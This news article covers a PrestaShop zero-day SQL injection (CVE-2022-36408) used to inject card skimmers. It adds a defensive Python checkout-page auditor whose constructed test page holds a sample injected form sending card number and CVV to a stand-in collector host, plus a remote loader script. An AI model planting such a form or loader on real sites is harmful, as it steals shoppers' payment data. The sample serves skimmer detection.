Malicious actors are exploiting a previously unknown security flaw in the open-source PrestaShop e-commerce platform to inject malicious skimmer code designed to steal sensitive information.
"Attackers have found a way to use a security vulnerability to carry out arbitrary code execution in servers running PrestaShop websites," the company noted in an advisory published on July 22.
PrestaShop is marketed as the leading open-source e-commerce solution in Europe and Latin America, used by nearly 300,000 online retailers worldwide.
The goal of the infections is to introduce malicious code capable of stealing payment information entered by customers on checkout pages. Shops running outdated versions of the software or other vulnerable third-party modules appear to be the prime targets.
The PrestaShop maintainers also said they discovered a zero-day flaw in their service that has been addressed in version 1.7.8.7, although they cautioned that "we cannot be sure that it is the only way for them to perform the attack."
"This security fix strengthens the MySQL Smarty cache storage against code injection attacks," PrestaShop noted. "This legacy feature is maintained for backward compatibility reasons and will be removed from future PrestaShop versions."
The issue in question is an SQL injection vulnerability affecting versions 1.6.0.10 or greater, and is being tracked as CVE-2022-36408.
Successful exploitation of the flaw could allow an attacker to submit a specially crafted request that grants the ability to execute arbitrary instructions, in this case to inject a fake payment form on the checkout page to harvest credit card information.
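The injected fake payment form described above is something a shop can look for on the pages it actually serves. The following is an added detection example written for this article; it is not PrestaShop code and not part of the advisory. It assumes the shop knows its own hostname and the hosts that legitimately receive card data (the constructed placeholders shop.example and pay.example), parses a checkout page, and flags card-capturing forms that post to any other host, external scripts loaded from untrusted hosts, and a second card-capturing form sitting beside the real one. The two HTML pages are constructed samples.

```python
"""Heuristic audit of a served checkout page for injected card-capture forms.

Added example for this article; not PrestaShop or advisory code.
Assumes the shop's own host and its payment provider host are known
(constructed values below).
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts allowed to receive checkout data or serve scripts (constructed placeholders).
SHOP_HOST = "shop.example"
TRUSTED_HOSTS = {SHOP_HOST, "pay.example"}

# name/autocomplete fragments that mark an input as collecting card data.
CARD_HINTS = ("cc-number", "cardnumber", "card_number", "cvv", "cvc", "cc-exp")


class CheckoutAuditor(HTMLParser):
    """Collects every form with its inputs, plus external script sources."""

    def __init__(self):
        super().__init__()
        self.forms = []      # [{"action": str, "inputs": [str, ...]}, ...]
        self.scripts = []    # src attribute of each <script src=...>
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            label = f"{a.get('name') or ''} {a.get('autocomplete') or ''}".lower()
            self._current["inputs"].append(label)
        elif tag == "script" and a.get("src"):
            self.scripts.append(a["src"])

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def _host(url):
    """Hostname of a URL; relative URLs resolve to the shop's own host."""
    return urlparse(url).hostname or SHOP_HOST


def audit_checkout(html):
    """Return a list of human-readable findings for one checkout page."""
    parser = CheckoutAuditor()
    parser.feed(html)
    findings = []
    card_forms = 0
    for form in parser.forms:
        collects_card = any(h in f for f in form["inputs"] for h in CARD_HINTS)
        if not collects_card:
            continue
        card_forms += 1
        host = _host(form["action"])
        if host not in TRUSTED_HOSTS:
            findings.append(f"card-capturing form posts to untrusted host {host}")
    if card_forms > 1:
        # A skimmer often adds its own form next to the genuine one.
        findings.append(f"{card_forms} card-capturing forms on one checkout page")
    for src in parser.scripts:
        host = _host(src)
        if host not in TRUSTED_HOSTS:
            findings.append(f"external script from untrusted host {host}")
    return findings


# Constructed sample: a clean checkout page handing card data to the provider.
CLEAN_PAGE = """
<html><body>
<script src="/themes/classic/assets/js/theme.js"></script>
<form action="https://pay.example/authorize" method="post">
  <input name="cc-number" autocomplete="cc-number">
  <input name="cc-exp" autocomplete="cc-exp">
</form>
</body></html>
"""

# Constructed sample: same page with an injected form and loader script.
INJECTED_PAGE = CLEAN_PAGE + """
<form action="https://collector.invalid/submit" method="post">
  <input name="card_number"><input name="cvv">
</form>
<script src="https://collector.invalid/loader.js"></script>
"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, audit_checkout(page) or "no findings")
```

Run it periodically against the checkout page as a real customer would fetch it (not the template on disk), because the injected form is what the browser receives, and diff the findings against the last known-good run.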
The development follows a wave of Magecart attacks targeting the restaurant ordering platforms MenuDrive, Harbortouch, and InTouchPOS, resulting in the compromise of at least 311 restaurants.